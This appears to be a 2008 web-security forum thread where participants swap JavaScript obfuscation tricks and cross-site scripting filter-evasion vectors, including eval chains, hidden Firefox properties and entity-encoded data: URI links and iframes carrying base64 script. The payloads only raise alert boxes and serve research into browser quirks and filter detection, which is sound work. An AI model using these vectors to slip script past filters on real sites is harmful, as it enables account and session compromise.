I've been reading the ECMA spec cause I'm bored:-

Function('a','\al\ert(a)')(1)

The above calls functions and arguments with a string

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I was looking at E4X last night:

a='alert';eval(<{a}>{a}</{a}>+'(a)') 

Here is a RegExp trick:-

'xxxalert(1)'.match(/[^x]+/);
eval(RegExp['$&'])

The RegExp object is open to information disclosure in Firefox as it's possible to return text matched from FF extensions if they use the object.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

eval(String(/\x61\x6c\x65\x72\x74\x28\x31\x29/.exec(/zzzzalert(1)/)));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth:

Nice find - the RegExp object can indeed be used to access data which shouldn't be available IMHO:

function foo () {
  var abc = '123456'.match(/(\d)(\d)/)
  var def = window
}

function bar() {
  console.dir(RegExp) //the regex info from foo()
  console.dir(abc) //undefined
  console.dir(def) //undefined
}

foo()
bar()

document.@x = function() {
alert(1);
}
document.@x();

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

A nice way to clone a object:-

function clone(obj) {
 return eval(uneval(obj));
}

Usage:-
o1 = {test:'hello1'};
o2 = clone(o1);
alert(o1.test);
alert(o2.test);
o2.test = 'hello2';
alert(o1.test);
alert(o2.test);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/31/2008 09:53AM by Gareth Heyes.

@Gareth:
nice, why not "Javizing" JS this way, then:

Object.prototype.clone = function() {
  return eval(uneval(this));
}
alert("test".clone());
alert((3).clone());
alert(clone.clone());

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@mai

Yep good idea, I was just providing a small example though based on a small js hacking library I've been working on which is gonna be prototyped and more OO.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

This works in Opera maybe others:-

<script src="data:text/javascript,alert(1)"></script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Found this link on John Resig's blog:-
http://google-caja.googlecode.com/svn/changes/mikesamuel/string-interpolation-29-Jan-2008/trunk/src/js/com/google/caja/interp/index.html

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

This is a little silly. Nothing particularly exciting, just ridiculous to see that it works in FF.

[_=(/al/ig)[-1]+(/ert/mgi)[1-2]][(/ev/img)[-1]+(/al/gimmi)[-Math.cos(0)]](_).valueOf()(1)

Haha!
-Dan

Data urls tricks:-

<a href=data&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>test</a>
<a href=&#x20&#100&#97&#116&#97&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>test</a>

<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>

This one shows that FF reads base64 and ignores every character after until the payload:-
<a href=dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64a&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>Test</a>

Another example:-
<a href=dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64ANYTHING&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>Test</a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hehe awesome!

http://ejohn.org/blog/most-bizarre-ie-quirk/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

x=[1,2,3].input=alert,4,5
x(1)

x=[].x=[].y=alert
x(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 02/22/2008 02:17PM by Gareth Heyes.

Waldo has some awesome examples:-

({}).valueOf.call(null).alert('lose');

[].sort.call(null).alert('lose')

({}.constructor.prototype.toString=function(){return "f".constructor.fromCharCode(95,95,112,97,114,101,110,116,95,95);}, y={},y[{}].alert('lose'))

Nice one Waldo

Some more awesome examples available here:-
http://stuff.mit.edu/iap/facebook/slides2/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

eval(/a......./.exec(/#####alert(1)#####/)[0])

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> Hehe awesome!
>
> http://ejohn.org/blog/most-bizarre-ie-quirk/


Hey, is it even remotely possible to add code within the alert box itself? This is something I've just thought of.. I'd have to dig through the IE libraries to work out exactly what's happening when a JS alert box is called, but I'm sure it would be possible to add malicious code to a box, if not from a web app then by hooking IE and changing the call yourself.. Just a thought :)

edit: whats wrong with this?

&lt;\sc\r\ipt&gt;ale\u0072t('SS\x58'.&#x73;&#x70;&#x6c;&#x69;&#x74;('').&#114;&#101;&#118;&#101;&#114;&#115;&#101;().&#x6a;&#x6f;&#105;&#110;(''))&lt;\/\sc\r\ipt&gt;

it renders as

<\sc\r\ipt>ale\u0072t('SS\x58'.split('').reverse().join(''))<\/\sc\r\ipt>

:\



Edited 2 time(s). Last edit at 03/03/2008 09:47PM by fragge.

P=function(a,b){return Math.pow(a,b)}
e=''
for(i=1;i<5;i++){e+=String.fromCharCode((35/3)*P(i,3)-89*P(i,2)+(607/3)*i-24)}
document.location.toSource()[e]('ale'+'rt(1)')
Tee-hee-hee

-Dan

@DoctorDan: nerd! :)

Have I mentioned that sometimes you guys really worry me? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

@thrill, we already had gareth adding dingbat conversion for hackvertor at the wee hours of morning, which are detected without problems by php-ids's centrifuge, and now Dan is producing vectors from beyond. and you are worried *sometimes* ? :)

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Yes, just *sometimes*, but only while I'm awake.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Quote

vectors from beyond

Hehe - right indeed. This is an animal of a vector - hats off, Doc!

window[Boolean[-6][5]+Boolean[-6][3]+Boolean[-6][4]+String[-6][2]+String[-6][1]](1)

Works for any global object :D
a=0[eval[-6]](alert[-6])
a(1)

Here's how to create a string from any function name:-

function Anything(){}
alert(Anything[-6]); // alerts the string "Anything"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 03/06/2008 10:39AM by Gareth Heyes.

Can someone please explain this to me?

i=alert;(i[-5]['eval'](i))(1)

i=alert
(i[-5]['eval'](i))(1)

@mario

Hehe yeah I can explain....

[-5] is a secret property that stores the amount of arguments in a function, this can also be obtained using the length property on a function. The [-5] property returns 1 because that is the maximum amount of arguments, because it returns a number object eval is attached (it's attached to all objects in Firefox).

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

how in the name of all things did you come across that property, nice work tho

@asilvermtzion: When it was found that using a property of -1 did something wierd with intervals in IE (I think this is what sparked it, I'm not sure), Gareth did some poking around and found that there are hidden properties in the negative, the most useful (imo) being -6 for the name of the object/function being used. Quite cool :) There's a function for finding some of them ( i haven't tried it ) on thespanner.co.uk homepage